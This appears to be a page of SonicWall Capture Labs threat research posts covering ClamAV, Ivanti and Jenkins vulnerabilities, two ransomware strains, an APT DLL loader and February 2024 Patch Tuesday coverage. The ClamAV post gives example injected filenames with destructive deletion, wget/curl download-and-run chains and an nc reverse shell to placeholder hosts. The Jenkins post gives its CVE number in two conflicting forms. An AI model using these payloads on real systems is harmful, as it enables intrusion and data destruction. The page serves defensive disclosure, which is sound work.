Posts

ClamAV ClamD Service

SonicWall Capture Labs Threat Research Team became aware of the ClamAV VirusEvent command injection vulnerability (CVE-2024-20328), assessed its impact, and developed mitigation measures for the vulnerability.

ClamAV is a notable, open-source anti-virus engine, widely recognized for its comprehensive suite of security solutions. It offers an array of features, including web and email scanning capabilities, endpoint security, a multi-threaded daemon, command line scanning tools, and an automatic database update service. The software boasts extensive support for various file formats, including zip, PE, rar, dmg, tar, GZIP, Bzip2, OLE2, MS Office and pdf, among others. This broad compatibility ensures that ClamAV can effectively scan and detect potential threats across a wide range of documents and files, providing robust protection against malware and viruses.

Recently, a significant security concern has emerged with the discovery of a command injection vulnerability within ClamAV. This flaw arises from the software’s mishandling of input intended for the generation of command strings. By exploiting this vulnerability, a remote attacker can orchestrate an attack by dispatching a malicious file or email to a system protected by ClamAV. If the tainted content is scanned by the compromised software, the attacker could achieve arbitrary code execution, operating under the privileges of the user running the “clamd” service. This exposes the affected systems to potential unauthorized access and control, underlining the critical need for immediate remediation and updates to safeguard against such vulnerabilities.

Product Versions Impacted

  • ClamAV 0.104 (all minor updates)
  • ClamAV 0.105 (all minor updates)
  • ClamAV 1.0.0 through 1.0.4 (LTS)
  • ClamAV 1.1 (all minor updates)
  • ClamAV 1.2.0
  • ClamAV 1.2.1

CVE Details

This security issue has been formally acknowledged and indexed in the Common Vulnerabilities and Exposures (CVE) system as CVE-2024-20328.

Due to its association with significant vulnerabilities in ClamAV, CVE-2024-20328 was given an overall CVSS score of 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L/E:U/RL:O/RC:C), indicating a high level of severity. This score is derived from a base score of 8.3, reflecting the vulnerability’s critical aspects and its implications for security. The detailed metrics reveal that the attack vector is via network, allowing potential exploitation from remote locations. The low attack complexity indicates that attackers can exploit the vulnerability with minimal effort, without requiring any privileges or user interaction, thereby widening the scope of potential attackers. The change in scope signifies that the impact of the vulnerability extends beyond the initially compromised component. Its impacts on data confidentiality, integrity and availability are all assessed as low, suggesting that while exploitation could compromise data or service, it does not lead to total loss or exposure of data.

The temporal score of 7.2 factors in the current status of the vulnerability’s exploit code maturity as unproven, indicating that there might not yet be any known exploits in the wild or that exploitation is not straightforward. The official fix at the remediation level points to the availability of patches or updates to mitigate the vulnerability, while the confirmed report confidence confirms the reliability of the reported vulnerability details.

Technical Overview

On January 2, 2024, a significant vulnerability was discovered within ClamAV, the widely utilized open-source antivirus engine. This vulnerability, arising from a command injection flaw in the VirusEvent feature of ClamAV, allows for the execution of arbitrary code on systems employing ClamAV for scanning purposes, particularly in environments like mail servers. The issue originates from the handling of crafted filenames, which, when scanned and identified as malicious by ClamAV, can trigger the execution of unauthorized commands on the system running the ClamAV daemon (clamd), all without necessitating any user interaction. This vulnerability thus presents a severe security risk, as it enables remote attackers to compromise the affected systems discreetly.

The core of the vulnerability lies in the VirusEvent feature’s functionality (See Figure 1), which is designed to execute a specified command upon the detection of a virus, using a format that incorporates placeholders for the virus name (“%v”) and the filename (“%f”). However, the critical oversight is the lack of sanitization for the filename input, permitting attackers to embed malicious commands within the filenames. These commands are then executed with the privileges of the user running clamd, as demonstrated in the clamd_others.c file’s virusaction function. This function, intended to facilitate the VirusEvent operation, constructs an environment where the PATH is set, along with variables for the filename and virus name, before dynamically building and executing a command string that includes the unsanitized filename, leading directly to the vulnerability.

Figure 1 – VirusEvent logic

Exploitation of this vulnerability can be illustrated through a configured VirusEvent in clamd.conf (See Figure 2), such as “echo VIRUS DETECTED: %v in the path %f >> /dev/stdout”. A specially crafted filename, like “# xmrig;whoami;”, can manipulate this feature to execute unintended commands, as seen in the execution output, where the command injection leads to the display of the virus detection message alongside the execution of the “whoami” command, revealing the system’s user context. This exploit underscores the imperative need for stringent input validation and the immediate application of security patches to address such vulnerabilities, safeguarding systems against potential remote attacks leveraging the ClamAV VirusEvent feature.

Figure 2 – clamd.conf entry

Triggering the Vulnerability

The ClamAV command injection vulnerability, identified in its VirusEvent feature, can be triggered under various scenarios, exploiting the lack of sanitization in the way command strings are constructed and executed. Here are four specific conditions or methods an attacker might use to exploit this vulnerability:

Embedded Commands in File Names:
Attackers might embed shell commands in file names (e.g., evilfile;rm -rf /;), which ClamAV could execute due to insufficient input sanitization in the VirusEvent feature.

Manipulating Environment Variables:
Crafted file names could manipulate environment variables to execute arbitrary commands (e.g., $(wget http://malicious.com/script.sh)), exploiting the direct passage of unsanitized command strings to a shell.

File Path Manipulation:
Attackers could include command injection payloads in file paths (e.g., /uploads/innocuous.pdf;nc -e /bin/bash attacker_ip 4444), effective in environments where ClamAV scans attacker-accessible directories.

Bypassing Command Execution Restrictions:
In restricted environments, attackers could bypass controls by crafting file names that initiate benign commands followed by malicious payloads (e.g., legitfile;curl http://malicious.com/malware -o /tmp/malware; chmod +x /tmp/malware; /tmp/malware), utilizing the VirusEvent feature for execution.

The methods above demonstrate the critical importance of validating and sanitizing all inputs in security mechanisms like ClamAV’s VirusEvent to prevent unauthorized command execution.

Exploitation

The exploitation of ClamAV’s vulnerability primarily centers on manipulating the virusaction function, especially the sequence following the vfork() system call. This function is tasked with responding to virus detection events and dynamically constructs a command string using input parameters, such as filenames and virus names, without adequately sanitizing them. The segment of code where exploitation is most critical involves the use of vfork() to spawn a new process. In the child process, identified when pid == 0, it proceeds to execute a shell command built from potentially unsafe user input via execle().

The vfork() call is crucial because it creates a new process by duplicating the address space of the calling process, allowing the child process to run in the same memory space as the parent until execle() is called. This approach is chosen for its efficiency, as it avoids the overhead of copying the entire address space of the parent process. However, the subsequent execution of a command with user-controlled input in a shell environment (/bin/sh) through execle() presents the vulnerability. The command buffer_cmd is executed in the shell without any sanitization, enabling arbitrary command execution if an attacker crafts malicious input that breaks out of the intended context.

Thus, this exploitation pathway permits attackers to run arbitrary code on systems operating ClamAV by inserting commands into filenames or other inputs processed by ClamAV, which are then included in buffer_cmd. Given that the command runs with the privileges of the ClamAV service, this vulnerability could lead to significant security incidents, including unauthorized system access, data exfiltration, or further system compromises. The specific line (See Figure 3) in the virusaction function becomes a focal point for security concerns, highlighting the critical need for strict input validation and sanitization in applications that execute commands based on external inputs.

Figure 3 – vfork() call and surrounding logic

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4281 ClamAV VirusEvent Command Injection

Visualizing Security: The Threat Graph

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Applying the vendor-supplied patch to eliminate this vulnerability
  • Utilizing up-to-date IPS signatures to filter network traffic
  • Configuring the vulnerable product to allow access to trusted clients only
  • Keeping security software and systems current for optimal defense
  • Conducting regular security audits to identify and remediate potential weaknesses

Relevant Links

Vendor Advisory
NIST NVD CVE
CWE-78
NIST CVSS Calculator Score

New LockXX Ransomware Targets Users Who Speak Standard Chinese, English

Overview

This week, the SonicWall Capture Labs threat research team analyzed a ransomware targeting users who speak English and Standard Chinese. Its behavior is typical of ransomware – it encrypts the user’s files and provides instructions on how to recover data while providing instructions in both English and Standard Chinese.

Infection Cycle

The malware arrives as a portable executable that, once executed, immediately spawns the command prompt to disable User Account Control (UAC). This Windows security feature helps thwart malware by alerting the user to any changes on the system that need administrative access. A Windows prompt will appear that alerts the user that a system reboot is needed to turn off UAC.

Figure 1: Prompt to alert the user that enabling/disabling UAC requires a reboot

However, this prompt quickly disappears and can easily go unnoticed. This malware ensures that the victim’s machine gets rebooted by using schtasks to add a scheduled task to reboot the system.

Figure 2: Scheduled task to shutdown the system

Another scheduled task to clear event logs is added that will run every five minutes.

Figure 3: Scheduled Task to clear event logs every five minutes

Files are then simultaneously encrypted, and the malware adds the lockxx extension to all encrypted files.

Figure 4: Encrypted files with .lockxx file extensions

A .hta file is added to every directory with an encrypted file that displays the instructions on how to recover data with a toggle between English and Standard Chinese.

Figure 5: Executing the file “lockxx.recover_data.hta” will open this window with instructions in English

Figure 6: A toggle for the Standard Chinese language is available within the instructions window

A log file is saved and named “info.log”. The file appears to be the event sequence of what the malware has executed on the machine.

Figure 7: Info.log containing malware execution event log

The most apparent indication of infection is the desktop wallpaper being changed to warn the user that their files have been encrypted.

Figure 8: Desktop wallpaper changed to show a warning that files have been encrypted

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Lockxx.RSM (Trojan)

 

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for February 2024

Overview
Microsoft’s February 2024 Patch Tuesday has 72 vulnerabilities – 30 of which are Remote Code Execution. The vulnerabilities can be classified into the following categories:

  • 30 Remote Code Execution Vulnerabilities
  • 17 Elevation of Privilege Vulnerabilities
  • 10 Spoofing Vulnerabilities
  • 8 Denial of Service Vulnerabilities
  • 4 Information Disclosure Vulnerabilities
  • 3 Security Feature Bypass Vulnerabilities

Figure 1: Breakdown by category

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2024 and has produced coverage for 7 of the reported vulnerabilities.

 

Vulnerabilities with Detections

CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability

  • ASPY 530 Exploit-exe exe.MP_365

CVE-2024-21345 Windows Kernel Elevation of Privilege Vulnerability

  • ASPY 534 Exploit-exe exe.MP_368

CVE-2024-21346 Win32k Elevation of Privilege Vulnerability

  • ASPY 539 Exploit-exe exe.MP_369

CVE-2024-21357 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability

  • ASPY 532 Exploit-exe exe.MP_367

CVE-2024-21371 Windows Kernel Elevation of Privilege Vulnerability

  • ASPY 531 Exploit-exe exe.MP_366

CVE-2024-21379 Microsoft Word Remote Code Execution Vulnerability

  • ASPY 533 Malformed-pdf pdf.MP_219

CVE-2024-21412 Internet Shortcut Files Security Feature Bypass Vulnerability

  • ASPY 540 Malformed-jpg jpg.MP_23

 

Adobe Coverage

CVE-2024-20748 Acrobat Reader Out-of-bounds Read

  • ASPY 535 Malformed-pdf pdf.MP_220

CVE-2024-20736 Acrobat Reader Out-of-bounds Read

  • ASPY 536 Malformed-pdf pdf.MP_221

CVE-2024-20726 Acrobat Reader Out-of-bounds Write

  • ASPY 537 Malformed-pdf pdf.MP_222

CVE-2024-20747 Acrobat Reader Out-of-bounds Read

  • ASPY 538 Malformed-pdf pdf.MP_223

 

Remote Code Execution Vulnerabilities 

CVE-2024-20667              Azure DevOps Server Remote Code Execution Vulnerability

CVE-2024-20673              Microsoft Office Remote Code Execution Vulnerability

CVE-2024-21339              Windows USB Generic Parent Driver Remote Code Execution Vulnerability

CVE-2024-21341              Windows Kernel Remote Code Execution Vulnerability

CVE-2024-21347              Microsoft ODBC Driver Remote Code Execution Vulnerability

CVE-2024-21349              Microsoft ActiveX Data Objects Remote Code Execution Vulnerability

CVE-2024-21350              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution     Vulnerability

CVE-2024-21352              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21353              Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability

CVE-2024-21357              Windows Pragmatic General Multicast (PGM) Remote Code Execution      Vulnerability

CVE-2024-21358              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21359              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21360              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21361              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21363              Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability

CVE-2024-21365              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21366              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21367              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21368              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21369              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21370              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21372              Windows OLE Remote Code Execution Vulnerability

CVE-2024-21375              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21376              Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability

CVE-2024-21378              Microsoft Outlook Remote Code Execution Vulnerability

CVE-2024-21379              Microsoft Word Remote Code Execution Vulnerability

CVE-2024-21384              Microsoft Office OneNote Remote Code Execution Vulnerability

CVE-2024-21391              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2024-21413              Microsoft Outlook Remote Code Execution Vulnerability

CVE-2024-21420              Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

 

Elevation of Privilege Vulnerabilities

CVE-2024-21304              Trusted Compute Base Elevation of Privilege Vulnerability

CVE-2024-21315              Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability

CVE-2024-21329              Azure Connected Machine Agent Elevation of Privilege Vulnerability

CVE-2024-21338              Windows Kernel Elevation of Privilege Vulnerability

CVE-2024-21345              Windows Kernel Elevation of Privilege Vulnerability

CVE-2024-21346              Win32k Elevation of Privilege Vulnerability

CVE-2024-21354              Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability

CVE-2024-21355              Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability

CVE-2024-21364              Microsoft Azure Site Recovery Elevation of Privilege Vulnerability

CVE-2024-21371              Windows Kernel Elevation of Privilege Vulnerability

CVE-2024-21374              Microsoft Teams for Android Information Disclosure

CVE-2024-21397              Microsoft Azure File Sync Elevation of Privilege Vulnerability

CVE-2024-21401              Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability

CVE-2024-21402              Microsoft Outlook Elevation of Privilege Vulnerability

CVE-2024-21403              Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability

CVE-2024-21405              Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability

CVE-2024-21410              Microsoft Exchange Server Elevation of Privilege Vulnerability

 

Denial of Service Vulnerabilities 

CVE-2024-20684              Windows Hyper-V Denial of Service Vulnerability

CVE-2024-21342              Windows DNS Client Denial of Service Vulnerability

CVE-2024-21343              Windows Network Address Translation (NAT) Denial of Service Vulnerability

CVE-2024-21344              Windows Network Address Translation (NAT) Denial of Service Vulnerability

CVE-2024-21348              Internet Connection Sharing (ICS) Denial of Service Vulnerability

CVE-2024-21356              Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability

CVE-2024-21386              .NET Denial of Service Vulnerability

CVE-2024-21404              .NET Denial of Service Vulnerability

 

Information Disclosure Vulnerabilities

CVE-2024-20695              Skype for Business Information Disclosure Vulnerability

CVE-2024-21340              Windows Kernel Information Disclosure Vulnerability

CVE-2024-21377              Windows DNS Information Disclosure Vulnerability

CVE-2024-21380              Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability

 

Spoofing Vulnerabilities 

CVE-2024-20679              Azure Stack Hub Spoofing Vulnerability

CVE-2024-21327              Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability

CVE-2024-21328              Dynamics 365 Sales Spoofing Vulnerability

CVE-2024-21381              Microsoft Azure Active Directory B2C Spoofing Vulnerability

CVE-2024-21389              Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2024-21393              Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2024-21394              Dynamics 365 Field Service Spoofing Vulnerability

CVE-2024-21395              Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2024-21396              Dynamics 365 Sales Spoofing Vulnerability

CVE-2024-21406              Windows Printing Service Spoofing Vulnerability

 

Security Feature Bypass Vulnerabilities

CVE-2024-21351              Windows SmartScreen Security Feature Bypass Vulnerability

CVE-2024-21362              Windows Kernel Security Feature Bypass Vulnerability

CVE-2024-21412              Internet Shortcut Files Security Feature Bypass Vulnerability

Wessy Ransomware Bears Striking Similarities to Uransomware

The SonicWall Capture Labs threat research team has been tracking ransomware that encrypts files and claims to charge only $100 for file retrieval.  It is written in .NET and obfuscated using Ezirizs .NET Reactor.  However, it is trivial to de-obfuscate and decompile by using open-source tools.  It is believed that this malware is from the same family as Uransomware (which we discussed in a previous blog post). Uransomware did not use obfuscation, but the code is very similar.

Infection Cycle

The code contains a region check which queries the current input language:

Figure 1: Query

A message box stating “Forbidden Country” is shown on the desktop if the specified region is detected and the program exits:

Figure 2: Forbidden Country message

If this region is not detected, the malware encrypts files on the system and appends “.wessy” to the filenames.

The code is obfuscated using software called Ezirizs .NET Reactor.  This is used to prevent disassembly of the malware and hinder reverse engineering:

Figure 3: Obfuscation

The obfuscation is easy to reverse by using an open-source tool called NETReactorSlayer by SychicBoy on GitHub.  A single command de-obfuscates the code and another single command using ILSpy decompiles it.  After this, the malware’s underlying functionality is revealed.

A ransom note is present in the deobfuscated code:

Figure 4: Ransom note

This message is written to READ_ME.txt:

Figure 5: READ_ME.txt

READ_ME.txt is dropped into all directories that contain encrypted files.

The following image is displayed on the desktop background:

Figure 6: Desktop background image

The malware contains a list of files to ignore:

Figure 7: List of files to ignore

The following file types are targeted for encryption:

Figure 8: Encryption targets

The malware contains a list of targeted directories:

Figure 9: Targeted directories

In order to disable system backups, the following applications are killed if they are running on the system:

Figure 10: Process kill list

The malware disables multiple system recovery measures:

Figure 11: Malware disabling recovery measures

We tried to reach out to the malware operator via the uTox address stated in the ransom note, but we received no reply.

SonicWall Protections

SonicWall Capture Labs protects against this threat via the following signature:

  • GAV: Wessy.RSM(Trojan)
This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Ivanti Server-Side Request Forgery to Auth-Bypass

Overview

Ivanti disclosed a couple more vulnerabilities — server-side request forgery (CVE-2024-21893) and a privilege escalation (CVE-2024-21888) vulnerability. This disclosure comes only a few weeks after confirming an exploit chain impacting Ivanti Connect Secure and Ivanti Policy Secure.  Ivanti has acknowledged that CVE-2024-21893 has impacted certain customers in targeted instances.

The SonicWall Capture Labs threat research team became aware of a server-side request forgery (SSRF) in Ivanti Connect Secure, Ivanti Policy Secure and ZTA gateways affecting all supported versions, including 9.x and 22.x. We assessed its impact and developed mitigation measures for the vulnerability. Since the previously disclosed vulnerabilities (CVE-2023-46805 and CVE-2024-21887) are already being exploited in the wild and under the scrutiny of threat actors, this SSRF vulnerability – a bypass to the previous mitigation – demands immediate action by upgrading the instances to the latest versions. The official patches have been released by Ivanti for all the vulnerabilities.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-21893.

The CVSS score is 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N), based on the following metrics:
• Attack vector is network.
• Attack complexity is low.
• Privileges required is none.
• User interaction is none.
• Scope is unchanged.
• Impact of this vulnerability on data confidentiality is high.
• Impact of this vulnerability on data integrity is low.
• Impact of this vulnerability on data availability is none.

Technical Overview

This vulnerability, an SSRF in the Security Assertion Markup Language (SAML) component of Ivanti products, is essentially a bypass of the mitigation for the original exploit chain. The threat actors can leverage CVE-2024-21893 to execute the original exploit chain involving CVE-2023-46805 and CVE-2024-21887 by circumventing the fix.

To understand the root cause, it is important to check the SAML endpoints, which do not require authentication as the vulnerability details indicate the privilege requirement is none. It is worth noting that the endpoint /dana-ws/saml20.ws can be accessed without authentication by examining the web server code provided by rapid7 as seen in Figure 1.

Figure 1: Web Server Code indicating unauthenticated endpoints, source: rapid7

Another piece of code, as seen in Figure 2, defining the function doDispatchRequest reveals that the unauthenticated http POST request targeting SAML endpoints /dana-ws/saml.ws, /dana-ws/saml20.ws, and /dana-ws/samlecp.ws are being sent to a service saml-server by doDispatchRequest. This request contains SOAP-based SAML components which are processed by saml-server and further transformed into an XML object by the function SoapHandler. Interestingly, the XML processing is being carried out by an outdated version 3.0.2 of external library called xmltooling, which in this context is vulnerable to the SSRF via a crafted KeyInfo element as mentioned in the CVE-2023-36661 description. This flaw can be leveraged to post an unauthenticated HTTP request containing malformed XML data to exploit underlying SSRF vulnerability in xmltooling as a means to circumvent the mitigation.

Figure 2: Code to process SAML requests, source: rapid7

Triggering the Vulnerability

Triggering this SSRF vulnerability requires a SOAP envelope to be sent to a SAML endpoint, preferably /dana-ws/saml20.ws which does not need authentication. The envelope includes a signature element which will be processed by the vulnerable xmltooling library. Furthermore, the signature contains a KeyInfo element, which can be exploited to SSRF according to an advisory published by the vendor Shibboleth. Additionally, the child element RetrievalMethod of KeyInfo let us access a remote resource using an HTTP GET request by specifying a URI in an attribute called URI, allowing a threat actor to insert an attack vector to exploit SSRF. For instance, the sample request in Figure 3 below can be used to send a request on behalf of the appliance.

Figure 3: Sample request to trigger SSRF

Exploitation

The HTTP request illustrated in Figure 3 can be converted into the pre-auth RCE by leveraging the command injection vulnerability (CVE-2024-21887) from the original exploit chain. The endpoint /api/v1/license/keys-status is one of the vulnerable endpoints which allows an attacker to inject commands using a simple GET request as illustrated in our previous blog post. Since the request is going to be originated from the same appliance, we can use localhost as a target IP to avoid the need for authentication. The plain request will look like the request below to yield a reverse shell back to an attacker’s machine.

Figure 4: Request

The above line needs to be URI decoded to get processed by the web server and replaced with the “Target URI” in the request shown in Figure 3, making the final request with the RCE payload look like  Figure 5 below.

Figure 5: Request to trigger RCE using SSRF

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:4266 Ivanti Connect Secure Server-Side Request Forgery
  • IPS:4268 Ivanti Connect Secure Server-Side Request Forgery 2

Remediation Recommendations

Considering the severe consequences of this vulnerability, the users of affected products are strongly encouraged to apply the patches as published in the vendor advisory.

Relevant Links

Jenkins CLI Data Leak Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of the Jenkins CLI (command-line-interface) arbitrary file read vulnerability, assessed its impact and developed mitigation measures for the vulnerability.

Jenkins is a Java-based automation tool that facilitates continuous integration/continuous delivery and deployment (CI/CD). Recently, an arbitrary file read vulnerability has been identified in Jenkins, specifically affecting its command-line interface (CLI). The flaw arises due to a feature in the Jenkins CLI command parser that improperly handles the ‘@’ character followed by a file path in an argument, resulting in disclosing the first few lines of the file. Consequently, a remote attacker without any privileges could potentially exploit this vulnerability by crafting a command that takes an arbitrary number of arguments and displays these back to the user. If exploited successfully, this vulnerability could grant the attacker unauthenticated access with no permissions (i.e. the default Jenkins install) and can leak the first couple of lines of arbitrary text files on a vulnerable Jenkins server.

Product Versions Impacted

  • Jenkins versions 2.441 and below
  • LTS 2.426.3 and below

CVE Details

This security issue has been formally acknowledged and indexed in the Common Vulnerabilities and Exposures (CVE) system, explicitly identified as CVE-2023-23897.

As per NIST NVD CVE, CVE-2023-23897 is still undergoing analysis and therefore there has been no defined CVSS score for this vulnerability as of yet. Although, based on the proof of concept (PoC), some references could be made. It has a network-based attack vector, meaning the vulnerability can be exploited remotely, and its attack complexity is low, suggesting minimal effort is required for exploitation. It necessitates no special privileges, increasing its potential reach, and it doesn’t require user interaction, enhancing its stealth and potential for unnoticed exploitation.

Technical Overview

A severe flaw highlighted as an arbitrary file read vulnerability has been reported in Jenkins instances, attributed to how Jenkins CLI uses the args4j library to parse command arguments and options. args4j is a small Java class library that makes it easy to parse command line options/arguments in your CUI application. The CLI is enabled by default in all possible Jenkins deployments. Jenkins is widely deployed, with tens of thousands of public-facing installs, and the Jenkins advisory was clear that this vulnerability could lead to remote code execution. When a user supplies certain arguments to the CLI of the vulnerable Jenkins servers, it misinterprets those arguments, specifically those starting with ’@’,  and in the resulting output, some lines of the file are echo’d back as part of error messages. This leads to a data leak vulnerability from arbitrary file read to remote code execution on the Jenkins controller file system using the default character encoding of the Jenkins controller process. Surprisingly, attackers without Overall/Read permission can read the first few lines of files and those with full permissions can read entire files. The number of lines that can be read depends on available CLI commands.

This data leak vulnerability could also be used to read binary files with cryptographic keys. There are various Jenkins features such as the “Remember me” cookie, build logs and resource root URLs that may lead to remote code execution by exploiting this vulnerability.

Some Jenkins’ features make this vulnerability easier to exploit. As shown in the figure below, the “Allow users to sign up” option allows anyone with access to the Jenkins server to self-register an account. And the “Allow anonymous read access” option gives any random user the Overall/Read permission.

Figure 1: Jenkins Controller File System Security Permissions

Exploitation with CVE-2024-23897

Args4j is a Java class library that makes it easy to parse command line options/arguments in CLI applications using annotations, and it generates usage text easily. The command line interface can be accessed over SSH or with the Jenkins CLI client – a .jar file distributed with Jenkins. In the patched Jenkins version, this SSH service is disabled by default and requires added authentication to get read permissions from the administrator.

While exploiting this vulnerability, the crucial part is to know the version of the live Jenkins instance. A simple curl request to a Jenkins deployment readily discloses its version in a header named “X-Jenkins”. This makes it easy to determine whether the Jenkins server is susceptible to this specific vulnerability.

Figure 2: A simple curl request to Jenkins Server

In the vulnerable Jenkins versions, an unauthenticated user is allowed to read a few lines (three lines) that do not have Overall/Read permissions at all. Even with this limitation, an attacker can achieve remote code execution and can decrypt secret keys. Using a specific command with “jenkins-cli.jar”, an unauthenticated attacker can disclose sensitive information. Here are a few examples:

Figure 3: Examples

Figure 4: Exploiting CVE-2024-23897

PoCs have been made public and could be readily used by attackers to leverage vulnerable Jenkins servers. Multiple reports suggest that Jenkins is being exploited in the wild.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:4251 Jenkins CLI Arbitrary File Read

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Applying the vendor-supplied patch to eliminate this vulnerability
  • Utilizing up-to-date IPS signatures to filter network traffic
  • Configuring the vulnerable product to allow access to trusted clients only

According to the Jenkins advisory, Jenkins 2.442, LTS 2.426.3 disables the command parser feature that replaces an ‘@’ character followed by a file path in an argument with the file’s contents for CLI commands. In another workaround, Jenkins suggests restricting access to CLI until the patch is applied to live instances.

Relevant Links

Vendor Advisory

NIST NVD CVE

SECURITY-3314-3315

Packetstrom Security

Github

Medium

Blackwood APT Group Has a New DLL Loader

Overview

This week, the SonicWall Capture Labs threat research team analyzed a sample tied to the Blackwood APT group. This is a DLL that, when loaded onto a victim’s computer, will escalate privileges and attempt to install a backdoor for communications monitoring and diversion. It has evasive capabilities and, as of this writing, is targeting companies and individuals in Japan and China.

Technical Overview

The sample is detected as a 32-bit DLL (Figure 1) with no packer or protector. It has minimal strings and no obvious obfuscation or encryption.

Figure 1: Sample detection

Strings show several API calls of concern, including GetCurrentProcessID, OpenProcess and VirtualAlloc – all of which are used to load malicious DLLs into memory. There are also two files listed: ‘333333333333333.txt’ and ‘Update.ini’, as shown in Figure 2.

Figure 2: Static string detection

The name of the file is shown as ‘agent.dll’ (Figure 3) and there is one anonymous export that is only shown as an ordinal value when looking at the file with multiple tools.

Figure 3: Original name and anonymous export

When dynamically analyzing the sample, it has multiple anti-analysis capabilities that prevent most of its function from being observed. It will look for debuggers, processor features and security settings in the registry (Figure 3). There are also locale checks that, when failed, will kill the process.

Figure 4: WMI registry keys being queried for security checks

The anonymous export at address 0x10001A70 is the file calling ‘Rundll32.exe’ for process injection, as shown in Figure 5.

Figure 5: Export address calls sub_10001990, which creates ‘rundll32.exe’

Controlling the program’s execution allows the check for a UAC bypass to be generated. The DLL will attempt to escalate privileges via CMSTPLUA interface[1]. The following strings are created, as shown in Figures 5 and 6:

  • Elevation:Administrator!new:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
  • Elevation:Administrator!new:{F885120E-3789-4FD9-865E-DC9B4A6412D2}

[1] https://gist.github.com/hfiref0x/196af729106b780db1c73428b5a5d68d

Figures 6 (top) and 7 (bottom): A function creates GUIDs for privilege escalation

The two files that are listed within the strings are also referenced during runtime (Figure 7), but despite multiple attempts at controlling execution, the files were not observed on test systems.

Figure 8: Update.ini is referenced but never created

Protection

To ensure SonicWall customers are prepared for any exposure that may occur due to this malware, the following signatures have been released:

  • MalAgent.Blackwood

IOCs

  • 72B81424D6235F17B3FC393958481E0316C63CA7AB9907914B5A737BA1AD2374

Ivanti Authentication Bypass Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of the Ivanti Connect Secure and Policy Secure Gateway authentication bypass vulnerability, assessed its impact and developed mitigation measures for the vulnerability.

Ivanti Connect Secure, formerly known as Pulse Connect Secure, is an SSL VPN (Virtual Private Network) solution designed to enable remote and mobile users to access corporate networks securely from any web-enabled device. Recently, an authentication bypass vulnerability has been identified in both Ivanti Connect Secure and Ivanti Policy Secure Gateways. This security flaw arises from insufficient validation of HTTP request paths within the software. Consequently, a remote attacker could potentially exploit this vulnerability by crafting a malicious HTTP request directed at the target server. If exploited successfully, this vulnerability could grant the attacker unauthenticated access to otherwise secure, authenticated web endpoints, posing a significant security risk to affected systems.

Product Versions Impacted

The list below concisely summarizes the Common Platform Enumeration (CPE) entries for Ivanti’s Connect Secure and Policy Secure products. It encompasses a range of versions and revisions, highlighting the extensive variety within the product lineup. The versions impacted are as follows:

  • Ivanti Connect Secure:
    • Version 9.0: Base, – , r1 – r6, r2.1, r3 – r3.5, r4 – r4.1, r5.0, r6.0
    • Version 9.1: r1, r10 – r11.5, r12 – r12.1, r13 – r13.1, r14, r15 – r15.2, r16 – r16.1, r17 – r17.1, r18, r2 – r4.3, r5 – r9.1
    • Version 22.1: r1, r6
    • Version 22.2: -, r1
    • Version 22.3: r1
    • Version 22.4: r1, r2.1
    • Version 22.5: r2.1
    • Version 22.6: -, r1, r2
  • Ivanti Policy Secure:
    • Version 9.0: Base, – , r1 – r4
